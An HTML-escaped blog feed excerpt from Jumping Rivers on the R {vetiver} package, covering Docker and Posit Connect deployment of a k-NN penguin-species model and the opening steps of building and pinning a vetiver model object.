Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-vetiver-deploying-mlops-docker"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="creating-a-docker-file"&gt;Creating a Dockerfile&lt;/h3&gt;
&lt;p&gt;The {vetiver} package simplifies creating a Dockerfile. We simply run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_prepare_docker&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;board_connect&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;colin/k-nn&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; docker_args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8080&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This command accomplishes several tasks:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Uses the &lt;a href="https://rstudio.github.io/renv/articles/renv.html" rel="external"&gt;&lt;code&gt;{renv}&lt;/code&gt;&lt;/a&gt;
package to create a list of R package dependencies required to run
your model.&lt;/li&gt;
&lt;li&gt;Creates a file named &lt;code&gt;plumber.R&lt;/code&gt; containing the necessary code to
deploy an API, essentially just &lt;code&gt;vetiver_api()&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Generates the Dockerfile.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The Dockerfile includes several components. The first component sets the
R version, specifies the package repository, and crucially, installs the
necessary system libraries.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;FROM&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;rocker/r-ver:4.4.0&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;ENV&lt;/span&gt; RENV_CONFIG_REPOS_OVERRIDE https://packagemanager.rstudio.com/cran/latest&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; apt-get update -qq &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get install -y --no-install-recommends &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; ...&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The second component copies the renv.lock file and installs the required
R packages:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;COPY&lt;/span&gt; vetiver_renv.lock renv.lock&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; Rscript -e &lt;span style="color:#a5d6ff"&gt;&amp;#34;install.packages(&amp;#39;renv&amp;#39;)&amp;#34;&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; Rscript -e &lt;span style="color:#a5d6ff"&gt;&amp;#34;renv::restore()&amp;#34;&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, we have the plumber/API section&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;COPY&lt;/span&gt; plumber.R /opt/ml/plumber.R&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;EXPOSE&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;8080&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;ENTRYPOINT&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#34;R&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;-e&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;pr &amp;lt;- plumber::plumb(&amp;#39;/opt/ml/plumber.R&amp;#39;); pr$run(host = &amp;#39;0.0.0.0&amp;#39;, port = 8080)&amp;#34;&lt;/span&gt;]&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which runs the API on port 8080.&lt;/p&gt;
&lt;p&gt;The image is built via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker build --tag my-first-model .
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;--tag&lt;/code&gt; flag allows you to name your Docker image. You can inspect
your stored Docker images with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker image list
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;REPOSITORY TAG IMAGE ID CREATED SIZE
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my-first-model latest 792af21c775a About a minute ago 1.33GB
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To run the image, use&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm --publish 8080:8080 my-first-model
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="posit-connect--sage-maker"&gt;Posit Connect / SageMaker&lt;/h2&gt;
&lt;p&gt;We can also trivially publish the model to Posit Connect via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_deploy_rsconnect&lt;/span&gt;(board &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;board_connect&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;colin/k-nn&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Similarly, we can publish to SageMaker using the function
&lt;code&gt;vetiver_deploy_sagemaker()&lt;/code&gt;.&lt;/p&gt;
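&lt;p&gt;Once the API is running, for example in the Docker container started earlier, predictions can be requested from R. The following is a minimal sketch rather than a definitive recipe: it assumes the container is listening locally on port 8080, &lt;code&gt;query_model()&lt;/code&gt; is a hypothetical helper, and the penguin measurements are made up. A model hosted on Posit Connect or SageMaker would need its own URL and, most likely, authentication.&lt;/p&gt;

```r
# Sketch only: the URL assumes the Docker container from earlier is running on port 8080
# query_model() is a hypothetical helper, not part of {vetiver}
query_model = function(new_data, url = "http://127.0.0.1:8080/predict") {
  endpoint = vetiver::vetiver_endpoint(url)
  predict(endpoint, new_data)
}

# A made-up penguin with the three predictors used by the model
new_penguin = data.frame(
  island = "Biscoe",
  flipper_length_mm = 210,
  body_mass_g = 5000
)

# Uncomment once the API is up:
# query_model(new_penguin)
```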
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Vetiver: First steps in MLOps</title><link>https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/</link><pubDate>Thu, 13 Jun 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is Part 1 of a series of blogs on {vetiver}. Future blogs will
be linked here as they are released.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Vetiver: First steps in MLOps (This post)&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/"&gt;Vetiver: Model Deployment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/"&gt;Vetiver: Monitoring Models in Production&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 4: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/"&gt;Vetiver: MLOps for Python&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Most R users are familiar with the classic workflow popularised by R for
Data Science. Data scientists begin by importing and cleaning the data,
then iteratively transform, model, and visualise it. Visualisation
drives the modelling process, which in turn prompts new visualisations,
and periodically, they summarise their work and report results.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/r4ds.svg" alt="Traditional data science workflow diagram. Stages are import, tidy, then transform, visualise, model in a loop, then communicate." style="display: block; margin: auto;" /&gt;
&lt;p&gt;This workflow stems partly from classical statistical modelling, where we
are interested in a limited number of models and in understanding the
system behind the data. In contrast, machine learning prioritises
prediction, necessitating the consideration and updating of many models.
Machine Learning Operations (MLOps) expands the modelling component of
the traditional data science workflow, providing a framework to
continuously build, deploy, and maintain machine learning models in
production.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/ml_ops_cycle.svg" alt="Machine learning cycle diagram. Stages are import + tidy, model, version, deploy, monitor, looping back round to import and tidy. Version, deploy and monitor are all gathered under the logo for vetiver." style="display: block; margin: auto;" /&gt;
&lt;h2 id="data-importing-and-tidying"&gt;Data: Importing and Tidying&lt;/h2&gt;
&lt;p&gt;The first step in deploying your model is automating data importation
and tidying. Although this step is a standard part of the data science
workflow, a few considerations are worth highlighting.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;File formats:&lt;/strong&gt; Consider moving from large CSV files to a more
efficient format like Parquet, which reduces storage costs and
simplifies the tidying step.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Moving to packages:&lt;/strong&gt; As your analysis matures, consider creating an R
package to encourage proper documentation, testing, and dependency
management.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Tidying &amp;amp; cleaning:&lt;/strong&gt; With your code in a package and tests in place,
optimise bottlenecks to improve efficiency.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Versioning data:&lt;/strong&gt; Ensure reproducibility by including timestamps in
your database queries or otherwise ensuring you can retrieve the same
dataset in the future.&lt;/p&gt;
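&lt;p&gt;As a rough illustration of the file-format point above, the sketch below round-trips a small data frame through CSV and Parquet. It assumes the {arrow} package is installed (this post does not name a Parquet library, so that choice is ours), and the temporary file paths are placeholders rather than part of any real pipeline.&lt;/p&gt;

```r
# Sketch only: {arrow} is an assumption; the post does not name a Parquet library
csv_path = tempfile(fileext = ".csv")
parquet_path = tempfile(fileext = ".parquet")

# Stand-in for a raw CSV export
write.csv(mtcars, csv_path, row.names = FALSE)
cars = read.csv(csv_path)

# Parquet stores column types with the data, so they are not re-guessed on import
arrow::write_parquet(cars, parquet_path)
cars_parquet = arrow::read_parquet(parquet_path)

# Column types before and after the round trip
sapply(cars, class)
sapply(cars_parquet, class)
```

&lt;p&gt;On a dataset this small any difference in file size is negligible; the potential savings apply to larger files.&lt;/p&gt;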
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-vetiver-mlops-tidymodels-deployment"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="modelling"&gt;Modelling&lt;/h2&gt;
&lt;p&gt;This post isn’t focused on modelling frameworks, so we’ll use
&lt;a href="https://www.tidymodels.org/" rel="external"&gt;{tidymodels}&lt;/a&gt; and the &lt;a href="https://allisonhorst.github.io/palmerpenguins/" rel="external"&gt;{palmerpenguins}&lt;/a&gt; dataset for brevity.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;palmerpenguins&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidymodels&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Remove missing values&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tidyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;(penguins, flipper_length_mm)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We aim to predict penguin species using island, flipper_length_mm, and
body_mass_g. A scatter plot indicates this should be feasible.
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/./scatter-plot-1.svg" alt="Plot of Body mass (g) vs flipper length (mm). The species of penguin is shown by the colour and the island is shown by the shape. There is a visible split between the Gentoo penguins and the others, with gentoo being overall larger in both ways." width="666.666666666667" style="display: block; margin: auto;" /&gt;
The scatter plot shows a clear separation between Gentoo and the other
species, but separating Adelie from Chinstrap looks a little
trickier.&lt;/p&gt;
&lt;p&gt;Modelling-wise, we’ll again keep things simple: a straightforward
nearest-neighbour model, where we use the island, flipper length and
body mass to predict species type:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;recipe&lt;/span&gt;(species &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; island &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; flipper_length_mm &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; body_mass_g,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguins_data) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;workflow&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;nearest_neighbor&lt;/span&gt;(mode &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;classification&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fit&lt;/span&gt;(penguins_data)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The model object can now be used to predict species. Predicting on the same
data used to fit the model gives an accuracy of around 95%, which is likely
an optimistic estimate as no data was held out.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model_pred &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;predict&lt;/span&gt;(model, penguins_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(model_pred&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;.pred_class &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.character&lt;/span&gt;(penguins_data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;species))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 0.9474&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="vetiver-model"&gt;Vetiver Model&lt;/h2&gt;
&lt;p&gt;Now that we have a model, we can start with MLOps and &lt;a href="https://rstudio.github.io/vetiver-r/" rel="external"&gt;{vetiver}&lt;/a&gt;. First,
collate all the necessary information to store, deploy, and version the
model.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;v_model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_model&lt;/span&gt;(model,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; model_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;k-nn&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; description &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;blog-test&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;v_model
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; ── k-nn ─ &amp;lt;bundled_workflow&amp;gt; model for deployment &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; blog-test using 3 features&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;v_model&lt;/code&gt; object is a list with six elements, including our
description.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;names&lt;/span&gt;(v_model)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;model&amp;#34; &amp;#34;model_name&amp;#34; &amp;#34;description&amp;#34; &amp;#34;metadata&amp;#34; &amp;#34;prototype&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [6] &amp;#34;versioned&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;v_model&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;description
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;blog-test&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;metadata&lt;/code&gt; contains various model-related components.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;v_model&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;metadata
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $user&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; list()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $url&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $required_pkgs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;kknn&amp;#34; &amp;#34;parsnip&amp;#34; &amp;#34;recipes&amp;#34; &amp;#34;workflows&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3 id="storing-your-model"&gt;Storing your Model&lt;/h3&gt;
&lt;p&gt;To deploy a {vetiver} model object, we use a pin from the &lt;a href="https://pins.rstudio.com/" rel="external"&gt;{pins}&lt;/a&gt;
package. A pin is simply an R (or Python!) object that is stored for
reuse at a later date. The most common use case of the {pins} package
(at least for me) is caching data for a Shiny application or Quarto
document. In other words, it is an easy way to &lt;a href="https://www.youtube.com/watch?v=P4F35qieIhQ" rel="external"&gt;cache
data&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;However, we can pin &lt;strong&gt;any&lt;/strong&gt; R object, including a pre-built model. We
pin objects to “boards”, which can live in many places, including
Azure, Google Drive, or a simple S3 bucket. For this example, I’m
using Posit Connect:&lt;/p&gt;
